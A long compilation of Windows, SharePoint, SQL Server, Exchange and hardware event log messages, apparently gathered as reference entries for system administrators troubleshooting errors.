System.IO.FileNotFoundException: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone, SPUserToken userToken)
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone)
at Microsoft.SharePoint.SPSite.LookupUriInRemoteFarm(SPFarm farm, Guid id, SPUrlZone zone)
at Microsoft.Office.Server.Administration.SharedResourceProvider.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.ServerContext.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.Audience.AudienceSiteInfo..ctor(ServerContext serverContext, Boolean bCentral, Boolean bPublic, AudienceAccessRights AccessRights)
at Microsoft.Office.Server.Audience.AudienceManager.get_Audiences()
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordAudienceApplicationSspData(SharedResourceProvider ssp)
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordSspData(SharedResourceProvider ssp)
Message:
Free disk space for drive T:\ (ISBORA8_T) is below the configured limit of 2 percent. 2.00 percent of disk space (10239 Mb) are currently available on drive T:\.
Message:
Product: Microsoft Visual Studio 2005 Professional Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\a4cb8.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.
Message:
The NTP server (null) isn't sync'd, time not set
Source:
Service Control Manager
Message:
The APC UPS Service service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.
Source:
Microsoft-Windows-WMI
Message:
Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Category:
Account Management
Message:
User Account Unlocked:
Target Account Name: gwashington
Target Domain: USA
Target Account ID: USA\gwashington
Caller User Name: sys.admin
Caller Domain: USA
Caller Logon ID: (0x0,0x41708D37)
Source:
Microsoft-Windows-Security-Auditing
Category:
Other System Events
Message:
Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.
Error Code: 2
Message:
Windows cannot query for the list of Group Policy objects. Check the event log for possible messages previously logged by the policy engine that describes the reason for this.
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: My Name
Domain: MYDOMAIN
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: WORKSTATION
Message:
Free disk space for drive C:\ () is back above the configured limit of 500 Mb. 2389 Mb of disk space are currently available on drive C:\.
Source:
Microsoft Office 12
Message:
EventType office11shipassert, P1 1be6, P2 12.0.6215.0, P3 NIL, P4 NIL, P5 NIL, P6 NIL, P7 NIL, P8 NIL, P9 NIL, P10 NIL.
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID 693fe0b2-6c9f-47bf-9d1a-c6a2aa7cd3c3) threw an exception. More information is included below.
Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
Message:
Windows XP Service Pack 3 installation failed.
Access is denied.
Message:
Error 0x7d6 occurred while rendering message 0008-0000008949b3 for download for user user@emaildomain.com.
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\someprocess.exe
Process identifier: 3732
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 55751
Allowed: No
User notified: No
Source:
ActiveDocs Enterprise - Web Wizard
Message:
Error occured InitializeDeliveryServices services.Thread was being aborted. at DocumentDelivery.CheckQueues.CheckQueues() at DocumentDelivery.DeliveryServicesMonitor.RefreshDeliveryServices() at DocumentDelivery.DeliveryServicesMonitor.InitializeDeliveryServices() -
Source:
ActiveDocs Enterprise - Web Wizard
Message:
An error occured in the ActiveDocs Enterprise Service while checking queues for the database 'activedocs' on Server 'PROV109\ACTIVEDOCS' [D:\Applications\ActiveDocs\DocGenerator\activedocs.config]. Thread was being aborted. at WWTManager.WWTManager.CheckConversionAndDeliveryTimeOuts() at DocumentDelivery.CheckQueues.CheckQueues() - PROV109\ACTIVEDOCS - activedocs
Message:
SNMP Event Log Extension Agent did not initialize correctly.
Message:
Error processing registry parameters. Extension agent terminating.
Message:
Error positioning to end of log file -- seek to end of log failed. Handle specified is 635992. Return code from ReadEventLog is 1500.
Message:
SNMP Event Log Extension Agent did not initialize correctly.
Message:
Host ACLXIDS (Servers) changed its PING status from ERROR to OK. The reason for the status change was: 'Ping Successful (Rate:100%, Avg:0ms, Max:0ms, Min:0ms)'.
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.
Message:
The redirector failed to determine the connection type.
Message:
The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume NAME_OF_VOLUME.
Message:
3041 :BACKUP failed to complete the command BACKUP DATABASE [activedocs] TO DISK = N'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK' WITH INIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT
Message:
18210 :BackupMedium::ReportIoError: write failure on backup device 'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK'. Operating system error 112(There is not enough space on the disk.).
Message:
[1:1201:7] ATTACK-RESPONSES 403 Forbidden [Classification: Attempted Information Leak] [Priority: 2]: {TCP} 192.168.20.20:80 -> 216.86.148.242:48121
Message:
Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: johndoe
Source Workstation:
Error Code: 0xC0000071
Message:
Package 'transbackup' failed.
Message:
The audit log was cleared Primary User Name: SYSTEM Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) Client User Name: nsi Client Domain: NSISENTRYTBOH Client Logon ID: (0x0,0x2568E)
Source:
Microsoft-Windows-GroupPolicy
Message:
The Group Policy Client Side Extension Software Installation was unable to apply one or more settings because the changes must be processed before system startup or user logon. The system will wait for Group Policy processing to finish completely before the next startup or logon for this user, and this may result in slow startup and boot performance.
Source:
Application Management Group Policy
Message:
The removal of the assignment of application MySQL Connector/ODBC 5.1 from policy Software Installation failed. The error was : The system cannot find the file specified.
Source:
Application Management Group Policy
Message:
Failed to apply changes to software installation settings. The installation of software deployed through Group Policy for this user has been delayed until the next logon because the changes must be applied before the user logon. The error was : The group policy framework should call the extension in the synchronous foreground policy refresh.
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize because the processing of notifications could not be setup. Error code [0x80004005]. Verify that no other applications are currently bound to UDP port [2883], or try specifying a different port number.
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize. Error code: [0x80004005].
Message:
Backup Exec Alert: Job Cancellation
(Server: "servername") (Job: "Daily") The job was canceled because the response to a media request alert was Cancel, or because the alert was configured to automatically respond with Cancel, or because the Backup Exec Job Engine service was stopped.
For more information, click the following link:
http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml
Message:
Cleaning up corrupt content index metadata on d:\system volume information\catalog.wci. Index will be automatically restored by refiltering all documents.
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lgreenle Domain: mlsnet.local Logon Type: 7 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 9204 Transited Services: - Source Network Address: 192.168.0.76 Source Port: 39647
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lward Domain: Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 15676 Transited Services: - Source Network Address: 192.168.0.85 Source Port: 2235
Message:
Der Dateireplikationsdienst liest die Daten in den Systemdatenträger ein. Der Computer "SRV2" kann nicht zum Domänencontroller benannt werden, bis dieser Vorgang beendet ist. Das Systemvolumen wird dann unter SYSVOL freigegeben.
Um die SYSVOL-Freigabe zu überprüfen, geben Sie an der Eingabeaufforderung folgendes ein:
net share
Wenn der Dateireplikationsdienst den Scanvorgang beendet, erscheint die SYSVOL-Freigabe.
Die Initialisierung des Systemdatenträgers kann einige Zeit in Anspruch nehmen. Der Zeitaufwand ist von der Datenmenge im Systemdatenträger abhängig.
Category:
Performance Monitoring
Message:
The performance counter "PhysicalDisk(*)\Avg. Disk Queue Length" could not be monitored due to error "0xC0000BB8". Please make sure that the performance counter exists. If you are running a non-english version of Windows then performance counters are named in the language of the Operating System.
Message:
The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
Source:
Folder Redirection
Message:
Failed to perform redirection of folder Application Data. The new directories for the redirected folder could not be created. The folder is configured to be redirected to <\\MD61NTFS100\Home\%USERNAME%\Application Data>, the final expanded path was <\\MD61NTFS100\Home\E385776\Application Data>. The following error occurred: The system cannot find the path specified.
Message:
Activation context generation failed for "C:\someapp.exe". Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found. Please use sxstrace.exe for detailed diagnosis
Message:
The Windows PowerShell event log could not be cleared and backed up to file \\FS1\DEPARTMENTS\TECHNOLOGY\PRIVATE\EVENTLOGBACKUPS\VMUTIL WINDOWS POWERSHELL 04 11 2008 12 07.EVT due to the following error:
Access is denied.
.
Message:
Aborted connection 231292 to db: 'mydatabase' user: 'dbuser' host: '192.168.1.123' (Got an error reading communication packets)
Message:
Action "Desktop" was unable to create a mailslot for host "." due to error: The system cannot find the file specified.
Message:
Source: Process AnalyzerCube Processing Status: DTSRun: Loading...DTSRun: Executing...DTSRun OnStart: DTSStep_DTSOlapProcess.Task_1DTSRun OnError: DTSStep_DTSOlapProcess.Task_1, Error = -2147221384 (80040078) Error string: More than the maximum of 64,000 dimension member children for a single parent (dimension 'Zaaknummer', level 'Zaaknummer', member '141715'). Error source: Zaaknummer Help file: Help context: 1000440Error Detail Records:Error: 0 (0)
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID a778c03a-b4d5-47ad-b0d5-6130b9c8ba14) threw an exception. More information is included below.
Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
Message:
Mapi session '/O=Stercomm/OU=Amsterdam/cn=Recipients/cn=OBlanc' exceeded the maximum of 500 objects of type 'objtFolder'. For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
There are multiple accounts with name MSSQLSvc/venus.partnershipassurance.int:3038 of type DS_SERVICE_PRINCIPAL_NAME.
Source:
MSExchangeTransport
Message:
A non-delivery report with a status code of 5.3.0 was generated for recipient rfc822
Source:
Application Error
Message:
Faulting application NICA.exe, version 1.1.0.60823, faulting module NICA.exe, version 1.1.0.60823, fault address 0x0002af39.
Message:
Host SCISTONETBOTZ (EMEA Netbotz) changed its PING status from OK to ERROR. The reason for the status change was: "100% packets lost".
Message:
The driver disabled the write cache on device \Device\Harddisk0\DR0.
Message:
TCP/IP has chosen to restrict the scale factor due to a network condition. This could be related to a problem in a network device and will cause degraded throughput.
Source:
Service Control Manager
Message:
Timeout (30000 milliseconds) waiting for the hpqwmiex service to connect.
Message:
Adamm Mover Error: Unload Rewind Failure!
Error = ERROR_IO_DEVICE
Drive = "HP 2"
2E6FDCE6-51A8-4918-B499-9233C643E041
Media = ""
00000000-0000-0000-0000-000000000000
Read Mode: SingleBlock(0), ScsiPass(0)
Write Mode: SingleBlock(1), ScsiPass(1)
Source:
MS ExchangeIS Mailbox
Message:
Error 1245 while disabling rule on public folder with rule ID <rule id number>. The folder ID of the public folder is in the data section of this event.
Message:
Cluster resource <resource> in Resource Group <group> failed.
Source:
Windows Server Update
Message:
Self-update is not working
Source:
Share Point Portal Administration
Message:
An exception occured in the search synchronizer.
Source:
Microsoft-Windows-WPD-MTPClassDriver
Category:
Driver Initilization.
Message:
MTP WPD Driver has failed to start. Error 0x8007001f.
Message:
The Netlogon service could not read a mailslot message from The system cannot find the path specified. due to the following error:
03000000
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 toad.exe, P2 0.0.0.0, P3 46deb19e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 f46, P8 0, P9 n3ctrye2kn3c34sgl4zqyrbfte4m13nb, P10 NIL.
Source:
Sharepoint server 2007
Category:
Publishing Cache
Message:
Unable to connect publishing custom string handler for output caching. IIS Instance Id is '762598284', Url is 'http://spoint2007/....html'.
Message:
The name "DomainName :1d" could not be registered on the Interface with IP address w.x.y.z. The machine with the IP address w.x.y.a did not allow the name to be claimed by this machine.
Message:
Action "MSSQL Database", invoked by feature, "Performance Monitoring" was unable to connect to the database due to error "[HYT00] [Microsoft][ODBC SQL Server Driver]Timeout expired (0)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
EVENT # 2521
EVENT LOG System
EVENT TYPE Error
SOURCE Wins
EVENT ID 4204
COMPUTERNAME FDS-NT5
DATE / TIME 2/12/2009 8:56:27 AM
MESSAGE WINS could not read from the User Datagram Protocol (UDP) socket.
BINARY DATA 0000: 01 15 00 00 46 27 00 00
Message:
Category Logon/Logoff
Type: success A
NT AUTHORITY\ANONYMOUS LOGON
Successful Network Logon:
User Name:
Domain:
Logon ID: (0x0,0x265B7)
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name:
Logon GUID: -
Category:
SPNEGO (Negotiator)
Message:
The Security System detected an authentication error for the server cifs/SERVER.domain.local. The failure code from authentication protocol Kerberos was "The specified user does not exist.
(0xc0000064)".
Source:
Report Server Windows Service (EVENTSENTRY)
Category:
Startup/Shutdown
Message:
The report server database is an invalid version.
Source:
Application Popup
Message:
An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry.
Source:
User Profile Service
Message:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.
DETAIL -
2 user registry handles leaked from \Registry\User\S-1-5-21-3955188477-656860062-1151124159-1021:
Process 6540 (\Device\HarddiskVolume3\Windows\System32\winlogon.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021
Process 1356 (\Device\HarddiskVolume3\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021\Printers\DevModePerUser
Message:
Soap error: Restoring data into SoapMapper GetAuthenticationTicketResult failed.
Message:
Soap error: Unspecified client error..
Message:
Service stopped successfully.
Message:
The print spooler failed to reopen an existing printer connection because it could not read the configuration information from the registry key S-1-5-18\Printers\Connections. The print spooler could not open the registry key. This can occur if the registry key is corrupt or missing, or if the registry recently became unavailable.
Message:
"Insufficient Runtime Available"
Message:
Memory module #5 has exceeded its threshold of correctable errors. Subsequent correctable memory errors will continue to be corrected.
Source:
Windows Search Service
Message:
A document ID cannot be allocated.
Context: Windows Application, SystemIndex Catalog
Details:
The content index server cannot update or access information because of a database error. Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases it may be necessary to delete and recreate the content index. (0x8004117f)
Message:
The system failed to register host (A or AAAA) resource records (RRs) for network adapter
with settings:
Adapter Name : 27E49756-7394-4750-8CDC-8D3EAF944953
Host Name : YOURSERVER
Primary Domain Suffix : yourdomain.local
DNS server list :
192.168.2.10, 192.168.2.11
Sent update to server : 192.168.2.10:53
IP Address(es) :
192.168.2.95
The reason the system could not register these RRs was because of a security related problem. The cause of this could be (a) your computer does not have permissions to register and update the specific DNS domain name set for this adapter, or (b) there might have been a problem negotiating valid credentials with the DNS server during the processing of the update request.
You can manually retry DNS registration of the network adapter and its settings by typing "ipconfig /registerdns" at the command prompt. If problems still persist, contact your DNS server or network systems administrator. For specific error code, see the record data displayed below.
Message:
Scope, 192.168.1.0, is 95 percent full with only 1 IP addresses remaining.
Message:
The Apache service named reported the following error:
>>> httpd.exe: Syntax error on line 116 of C:/Program Files (x86)/CollabNet Subversion Server/httpd/conf/httpd.conf: Cannot load C:/Program Files (x86)/CollabNet Subversion Server/httpd/modules/mod_dav_svn.so into server: The specified module could not be found.
Source:
Microsoft-Windows-Security-Auditing
Message:
An account was logged off.
Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
Source:
Microsoft-Windows-Security-Auditing
Message:
User initiated logoff:
Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1
This event is generated when a logoff is initiated but the token reference count is not zero and the logon session cannot be destroyed. No further user-initiated activity can occur. This event can be interpreted as a logoff event.
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Redundancy lost
Redundancy unit: System Board PS Redundancy
Chassis location: Main System Chassis
Previous redundancy state was: Normal
Message:
Power supply #1 has failed.
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has been returned to the OK state.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6048 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has returned to a redundant state.
Chassis: '0'
[SNMP TRAP: 6054 in CPQHLTH.MIB]
Source:
Trend Micro Security Server
Message:
Threat Alert
OfficeScan detected Cryp_Neb-2 on COMPUTERNAME(user.name) in MyDomain domains.
File: C:\Software\Infected.zip (Infected.exe)
Detection date: 6/17/2009 21:45:17
Action: No action
Category:
1184 (no category messagefile registered)
Message:
Error (9241), SMTP notification error: smtplib.SMTPException: No suitable authentication method found. (failure)
pid="3756:236"
Message:
The description for Event ID ( 1 ) in Source ( LGTO_Sync ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: , Sync Stop done.
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) failed to load: storflt
Message:
NIC driver on 'COMPUTER' cannot load because it is incompatible with the server virtualization stack. Server version 2 Client version 1 (VMID D03E098F-B772-4AC4-B434-37527FDEF56A).
Source:
Service Control Manager
Message:
EVENT # 9697313
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7011
COMPUTERNAME SERVER
DATE / TIME 7/28/2009 8:11:23 PM
MESSAGE Timeout (30000 milliseconds) waiting for a transaction response from the SharedAccess service.
Source:
Application error
Message:
Faulting application wmiprvse.exe, version 5.2.3790.0, faulting module ntdll.dll, version 5.2.3790.0, fault address 0x0002caa2.
Category:
Service Monitoring
Message:
The status for driver Netaapl (Apple Mobile Device Ethernet Service) changed from Running to Stopped.
Message:
The DNS server encountered a packet addressed to itself on IP address xxx.xxx.xxx.xxx. The packet is for the DNS name "au.download.windowsupdate.com.". The packet will be discarded. This condition usually indicates a configuration error.
Check the following areas for possible self-send configuration errors:
1) Forwarders list. (DNS servers should not forward to themselves).
2) Master lists of secondary zones.
3) Notify lists of primary zones.
4) Delegations of subzones. Must not contain NS record for this DNS server unless subzone is also on this server.
5) Root hints.
Example of self-delegation:
-> This DNS server dns1.example.microsoft.com is the primary for the zone example.microsoft.com.
-> The example.microsoft.com zone contains a delegation of bar.example.microsoft.com to dns1.example.microsoft.com,
(bar.example.microsoft.com NS dns1.example.microsoft.com)
-> BUT the bar.example.microsoft.com zone is NOT on this server.
Note, you should make this delegation check (with nslookup or DNS manager) both on this DNS server and on the server(s) you delegated the subzone to. It is possible that the delegation was done correctly, but that the primary DNS for the subzone, has any incorrect NS record pointing back at this server. If this incorrect NS record is cached at this server, then the self-send could result. If found, the subzone DNS server admin should remove the offending NS record.
You can use the DNS server debug logging facility to track down the cause of this problem.
Source:
Windows Server Update Services
Message:
Some client computers have not reported back to the server in the last 30 days. 4 have been detected so far.
Message:
The backup file for action "DBMYSQL" has events queued, but the "DBMYSQL" action is currently disabled. The backup file for this action has been backed up to file "C:\Windows\TEMP\eventsentry_backup_f98ff348-8384-4ae8-ae76-6818e4e13765.tmp.backup" and the original file has been deleted.
Source:
SQL Server ODBC driver support error
Message:
Unable to load SQL Server ODBC driver resource DLL. The application cannot continue.
Message:
The number of events cached for action "MSSQL Database", which has been unreachable, exceeded 8192 events. If this action is no longer in use then you should disable or delete the action so that events are no longer cached. EventSentry will continue to cache events until the maximum size of the temporary backup file "C:\WINDOWS\TEMP\eventsentry_backup_xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
..tmp" (32 Mb) is reached. 133952 events are currently cached, the backup
file size is 32 Mb.
Message:
Would be blocked by port blocking rule (rule is in warn-only mode) (Anti-virus Standard Protection:Prevent mass mailing worms from sending mail).
Message:
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80070422).
Message:
The kerberos client received a KRB_AP_ERR_MODIFIED error from the server computerA$. The target name used was cifs/computerB.mydomain.local. This indicates that the password used to encrypt the kerberos service ticket is different than that on the target server. Commonly, this is due to identically named machine accounts in the target realm (MYDOMAIN.LOCAL), and the client realm. Please contact your system administrator.
Category:
Service Monitoring
Message:
The status for driver pssdk41 (PsSdk41) changed from Stopped to Running.
Additional Service Information:
Startup type: Manual
Executable: \??\C:\WINDOWS\system32\Drivers\pssdk41.sys
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddCoreCsiFiles : BeginFileEnumeration() failed.
System Error:
Access is denied.
..
Category:
Heartbeat Monitoring
Message:
The PING status of host <HOSTNAME> remains at ERROR due to error "gethostbyname: The requested name is valid, but no data of the requested type was found. ".
Message:
Microsoft FrontPage Server Extensions:
Error #3005f Message: Unable to read configuration for Microsoft Internet Information Server.
Source:
MSExchangeFBPublish
Message:
Unable to prepare message table for polling thread processing on virtual machine WCC-EXCHANGE-4. The error number is 0x80040115. Make sure that the Microsoft Exchange Information Store service is running.
Message:
The parent partition uses a different VMBus version. You need to Install a matching VMBus version in this guest installation.
Message:
A storage device in 'COMPUTERNAME' cannot load because it is incompatible with the server virtualization stack. Server version 2.0 Client version 4.2(VMID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX).
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is near or at capacity
Log type: ESM
Message:
The platform firmware has corrupted memory across the previous system power transition. Please check for updated firmware for your system.
Message:
The following fatal alert was generated: 10. The internal error state is 10.
- System
- Provider
[ Name] Schannel
[ Guid] {1F678132-5938-4686-9FDC-C8FF68F15C85}
EventID 36888
Version 0
Level 2
Task 0
Opcode 0
Keywords 0x8000000000000000
- TimeCreated
[ SystemTime] 2009-10-29T14:17:42.310964400Z
EventRecordID 27115
Correlation
- Execution
[ ProcessID] 500
[ ThreadID] 4548
Channel System
Computer OfficePC
- Security
[ UserID] S-1-5-18
- EventData
AlertDesc 10
ErrorState 10
Message:
File backup was cancelled by the user.
Message:
Remote Insight Agent: The Remote Insight Board/Integrated Lights-Out has detected a controller interface error.
[SNMP TRAP: 9006 in CPQSM2.MIB]
Source:
VDS Basic Provider
Message:
Unexpected failure. Error code: 490@01010004
Message:
Unable to connect to SMTP host smtp.gmail.com due to error "Timeout.". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
Error during SMTP communication with SMTP host "192.168.1.48". After sending "." the following error occurred: "[10057] Socket is not connected".
Error during SMTP communication with SMTP host "%1". After sending "%2" the following error occurred: "%3".
Message:
Unable to connect to SMTP host 192.168.1.48 due to error [10060] Connection timed out. Will try backup smtp host smtp.gmail.com now.
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
Action "Event log to text file" was unable to create/open file "C:\EventSentry\eventsentry_events.txt" due to error: Access is Denied.
Action "%1" was unable to create/open file "%2" due to error: %3
Message:
While transmitting or receiving data, the server encountered a network error. Occassional errors are expected, but large amounts of these indicate a possible error in your network configuration. The error status code is contained within the returned data (formatted as Words) and may point you towards the problem.
Source:
Microsoft-Windows-Folder Redirection
Message:
Folder redirection policy application has been delayed until the next logon because the group policy logon optimization is in effect.
Message:
AEN: SECTOR_REPAIR (port=1, LBA=0xEFFD80)
Message:
AEN: DEGRADED_UNIT (unit=0, port=1)
Message:
EventSentry determined that the recommended management suite ("OpenManage") from the hardware manufacturer (Dell) is either not installed or not currently running on this server. Without this software, EventSentry will not be able to alert you of critical hardware warnings and/or errors, such as a hard drive failure in a RAID. Please visit the manufacturer's web site to obtain more information and install the recommended management suite.
Additional Information:
Manufacturer: Dell
Model: PowerEdge 1900
Bios Version: 2.2.6
Message:
Activation context generation failed for "somefile.dll".Error in manifest or policy file "Microsoft.VC90.CRT\Microsoft.VC90.CRT.MANIFEST" on line 4. Component identity found in manifest does not match the identity of the component requested. Reference is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.21022.8". Definition is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.30729.4148". Please use sxstrace.exe for detailed diagnosis.
Message:
The system failed to register host (A or AAAA) resource records for network adapter
with settings:
Adapter Name : {D37428FB-D073-4403-87B8-3941F1C3A2B4}
Host Name : MYSERVER
Primary Domain Suffix : mydomain.local
DNS server list :
fec0:0:0:ffff::1, fec0:0:0:ffff::2, fec0:0:0:ffff::3
Sent update to server : <?>
IP Address(es) :
192.168.111.1
Either the DNS server does not support the DNS dynamic update protocol or the authoritative zone for the specified DNS domain name does not accept dynamic updates.
To register the DNS host (A or AAAA) resource records using the specific DNS domain name and IP addresses for this adapter, contact your DNS server or network systems administrator.
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD missing: SasAddr=0x5000c50001cde56d, ArrayRef=1, RowIndex=0x3, EnclPd=0xff, Slot=5.
: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PDs missing from configuration at boot: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: VDs missing drives and will go offline at boot: 01: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Controller event log: VD 01/1 is now OFFLINE: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)
Message:
DCOM got error "%2147944122" from the computer xxxxxx when attempting to activate the server:
xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxxx
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)
Message:
Action "MSSQL Database", invoked by feature, "Software
Monitoring" was unable to connect to the database due to error "[01000] [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]ConnectionOpen (Connect()). (11004)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
The device 'Storage miniport driver' (VMBUS\1481C722-3FBE-4DD2-9468-7D8F1396B27D\1&3189fc23&0&{1481c722-3fbe-4dd2-9468-7d8f1396b27d}) disappeared from the system without first being prepared for removal.
Message:
The device 'Msft Virtual Disk SCSI Disk Device' (SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&240474ae&0&000000) disappeared from the system without first being prepared for removal.
Message:
The backup did not complete because of an error writing to the backup location B:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).
Message:
Windows cannot open the 64-bit extensible counter DLL aspnet_state in a 32-bit environment. Contact the file vendor to obtain a 32-bit version. Alternatively if you are running a 64-bit native environment, you can open the 64-bit extensible counter DLL by using the 64-bit version of Performance Monitor. To use this tool, open the Windows folder, open the System32 folder, and then start Perfmon.exe
Message:
The Virtual Storage Filter Driver is disabled through the registry. It is inactive for all disk drives.
Source:
Microsoft-Windows-Security-Auditing
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume2\Windows\System32\l3codeca.acm
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is full
Log type: ESM
Message:
Product: Adobe Reader 9.3 - Update '{AC76BA86-7AD7-0000-2550-7A8C40000934}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
Message:
